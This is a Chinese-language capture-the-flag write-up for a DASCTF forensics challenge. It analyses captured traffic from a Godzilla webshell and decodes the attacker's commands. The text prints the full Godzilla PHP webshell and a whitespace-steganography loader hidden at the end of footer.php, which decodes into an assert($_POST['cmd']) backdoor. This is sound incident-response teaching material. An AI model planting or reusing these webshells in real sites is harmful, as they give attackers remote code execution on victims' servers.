20250922_QQ_backdoor

Tags:流量分析,应急响应,WebShell,哥斯拉,Godzilla,空白字符隐写,AES,DASCTF

0x00. 题目

附件路径：https://pan.baidu.com/s/1GyH7kitkMYywGC9YJeQLJA?pwd=Zmxh#list/path=/CTF附件

附件名称：20250922_QQ_backdoor.zip

0x01. WP

1. 找到上传的shell

采用md5分段后前后混淆，典型的哥斯拉工具的流量特征。

<?php session_start(); @set_time_limit(0); @error_reporting(0); function E($D,$K){ for($i=0;$i<strlen($D);$i++) { $D[$i] = $D[$i]^$K[$i+1&15]; } return $D; } function Q($D){ return base64_encode($D); } function O($D){ return base64_decode($D); } $P='pass'; $V='payload'; $T='3c6e0b8a9c15224a'; if (isset($_POST[$P])){ $F=O(E(O($_POST[$P]),$T)); if (isset($_SESSION[$V])){ $L=$_SESSION[$V]; $A=explode('|',$L); class C{public function nvoke($p) {eval($p."");}} $R=new C(); $R->nvoke($A[0]); echo substr(md5($P.$T),0,16); echo Q(E(@run($F),$T)); echo substr(md5($P.$T),16); }else{ $_SESSION[$V]=$F; } }

2. 临时改写解码脚本

分别在1299和1328找到文件压缩和环境变量查看的请求流量

在线php运行环境：https://www.jyshare.com/compile/1/

<?php
function E($D,$K){ for($i=0;$i<strlen($D);$i++) { $D[$i] = $D[$i]^$K[$i+1&15]; } return $D; 
} 
function Q($D){ return base64_encode($D); 
} 
function O($D){ return base64_decode($D); 
} 
$P='pass'; 
$V='payload'; 
$T='3c6e0b8a9c15224a'; 
//Frame 1299
$request="OgRUWzZ/DUw5ZQReUGMZADBjDVsvCjMMLWVvWmVxJ103cA17N20NfTZaf2RgYTt2NgYzZzhUN0o1Wgxrf2I7ZjZaP3o4CBZDNFxdWFNgCkk5citaBlUncDZfZ1tjTgl/KVtUXAZ/CU85dABaUGM0CjRaDV8AfgpON19vW2ROJ1w6W1RiMmlcBA==";
$response="11cd6a8758984163KnUnWDh/M0kBXFYEe3w7WwBfXAMGCwJPAnlnRlB3WVQofis00QyBRWA0=6c37ac826a2a04b";
/*
request:
cmdLine=emlwIHd3dy56aXAgLXJQICRBUEFDSEVfUlVOX1VTRVIgL3Zhci93d3cvaHRtbC8K&methodName=ZXhlY0NvbW1hbmQ=cmdLine=zip www.zip -rP $APACHE_RUN_USER /var/www/html/methodName=execCommand
response:adding: var/www/html/ (stored 0%)adding: var/www/html/config.php (deflated 27%)adding: var/www/html/Wopop_files/ (stored 0%)adding: var/www/html/Wopop_files/google_jquery-ui.min.js (deflated 74%)adding: var/www/html/Wopop_files/logo.png (deflated 3%)adding: var/www/html/Wopop_files/._login_bgx.gif (deflated 44%)adding: var/www/html/Wopop_files/login_bgx.gif (deflated 1%)... ...
*/
$response=substr($response,16,strlen($response)-32);
echo "Frame 1299";
echo "\nrequest:\n";
echo O(E(O($request),$T));
echo "\nresponse:\n";
echo O(E(O($response),$T));
echo "\n\n";
//Frame 1158
$request="OgRUWzZ/DUw5ZQRTZE40SjIEBgkyaztNOWlnXVAGM3w6YVRcMm4RYAJ2TWh/cVQBOloGSAN/K002ZQUP";
$response="11cd6a8758984163MmAncjMICX87AH9kZlhYdjBgLAkuCztRAFgMS1ZjVUU6bidYOwoJVS5WRXBncSd3MHMzVjd9DXw7AW94ZnE0Ci8FP1gBUVhAB2YBRGtsI1s6BA1cL1FYUQB2c1hTczRKL1gnQDh5EWgyZ2d7YmdYAgAFLEYAf1hTOmZCRFEGK0MBXApGBmAvQC8DTURrBidALwQvQABSDk8HaXtLfgcvWgJhUQYuCzdDAFgMW1NjVQUvBStZA29VDy8Df0JQUxFxNnMjdDF9N183dAx2YQVYdjBgLAkuCztRAFgMQVAGL0EvBCNHO28vVjllfHlmcSd8MUxUdCFTJ2gyZHt7YGJYYDVjUFY0bi9/NlsEAVYHAkc5cSMAO2kRezZ0c3ZhcTdVNlozfzoIBWo3AGNjYmwFAAdPVFs7YDNRIFpzY2NhL3oxYFx9NggFXzF0WWFiZ1gBOm4sRgB/WFcvA3NFa2MvXDliLHs3fgV8M2IMWlF8IEU6YTdEA29VTwdpd0FQBidYIFFYDQ==6c37ac826a2a04bc";
$response=substr($response,16,strlen($response)-32);
echo "Frame 1158";
echo "\nrequest:\n";
echo O(E(O($request),$T));
echo "\nresponse:\n";
echo O(E(O($response),$T));
echo "\n";
/*
Frame 1158
request:
cmdLine=ZW52Cg==&methodName=ZXhlY0NvbW1hbmQ=cmdLine=envmethodName=execCommand
response:
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/app/admin/upload
*/
?>

得到压缩包密码为www-data

3. 导出压缩包找到flag.php

<?php
$enc = 'aes-128-ecb';
$flag = 'CN1Sq9tFItxZhsu3zCWbrdf6ozOL4eoKG0s71vGg/AKKnch3IL3jzwtXeCgWK5QP';
?>

4. 在footer.php尾部发现异常

... ...
<?php
$cache=end(preg_split('/>/',file_get_contents(basename($_SERVER['PHP_SELF']))));
for($i=0;$i<strlen($cache);$i++){$out.=chr(bindec(str_replace(array(chr(9),chr(32)),array('1','0'),substr($cache,$i,8))));$i+= 7;}$cachepart=' ';file_put_contents($cachepart,base64_decode($out));include $cachepart;unlink($cachepart);
?>

而且在后面还有大量\t和空格字符串

5. 分析脚本进行解码

# chr(9)=\t=1
# chr(32)=\r=0
010100000100010000111001011101110110000101001000010000010110011101000011011011010100011001111010011000110011001001010110011110010110010001000011011001110110101101011000001100010100001001010000010101010011000101010010011000100100101000110010010011100111010001011010010000110110010001100100010010110101010001110011011001110100001101010001011010110110011101000011010100110100000101001010010000110101001101000001010010100100001101010011010000010110011101000011010100110100000101001010010010010100000101101011010010100100001101010001011010110110011101001001010000010110101101100111010010010100000101101011011001110100100101000011010000010110011101001001010000110100000101001010010000110101001101000001010010100100100101000011010000010100101001001001010000010110101101001010010000110101001101000001011001110100001101010001011010110110011101001001010000010110101101100111010010010100001101000001011001110100100101000011010000010100101001000011010100110100000101100111010010010100000101101011011001110100100101000011010000010100101001000011010100010110101101100111010010010100000101101011011001110100001101010001011010110110011101001001010000110100000101100111010000110101001101000001011001110100001101010001011010110110011101000011010100010110101101100111010010010100001101000001010010100100001101010011010000010100101001001001010000110100000101100111010010010100000101101011010010100100100101000011010000010110011101000011010100110100000101001010010000110101001101000001011001110100001101010001011010110110011101001001010000110100000101001010010000110101001101000001011001110100001101010011010000010110011101001001010000010110101101001010010010010100000101101011010010100100001101010011010000010110011101000011010100010110101101100111010010010100001101000001011001110100100101000011010000010100101001000011010100110100000101001010010010010100001101000001011001110100100101000001011010110100101001001001010000110100000101100111010000110101001101000001011001110100001101010001011010110110011101000011010100010110101101001010010010010100001101000001010010100100001101010011010000010110011101000011010100110100000101100111010000110101000101101011011001110100100101000011010000010110011101000011010100110100000101001010010000110101001101000001011001110100001101010001011010110110011101000011011010100011100000101011BIN2CHR=>PD9waHAgCmFzc2VydCgkX1BPU1RbJ2NtZCddKTsgCQkgCSAJCSAJCSAgCSAJIAkJCQkgIAkgIAkgICAgICAJCSAJICAJIAkJCSAgCQkgIAkgICAgICAJCSAgIAkgICAJCQkgIAkgCQkgICAgCSAgCQkgCQkgICAJCSAJICAgIAkJICAgCSAJCSAgCQkgICAJCSAgCSAgIAkJIAkJCSAgCQkgICAgICAJCSAJICAgIAkJICAgCSAgCQkgCQkJICAJCSAgCSAgCQkgICAgCSAJCSAgCQkgCj8+Base64Decode=><?php 
assert($_POST['cmd']); 		 	 		 		  	 	 				  	  	      		 	  	 			  		  	      		   	   			  	 		    	  		 		   		 	    		   	 		  		   		  	   		 			  		      		 	    		   	  		 			  		  	  		    	 		  		 
?>

结果中依然有\t和空格,继续解码

0110101101100101011110010010000001101001011100110010000001100010001110010110000100110110001101000011000101100110001100100011011100110000001101000011000100110111001100100110000101100110BIN2CHR=> key is b9a641f2704172af

6. AES解码

enc = aes-128-ecb

key = b9a641f2704172af

flag = CN1Sq9tFItxZhsu3zCWbrdf6ozOL4eoKG0s71vGg/AKKnch3IL3jzwtXeCgWK5QP

最终得到flag为DASCTF{d8f191d0f0be0f039c4ededb7839218e}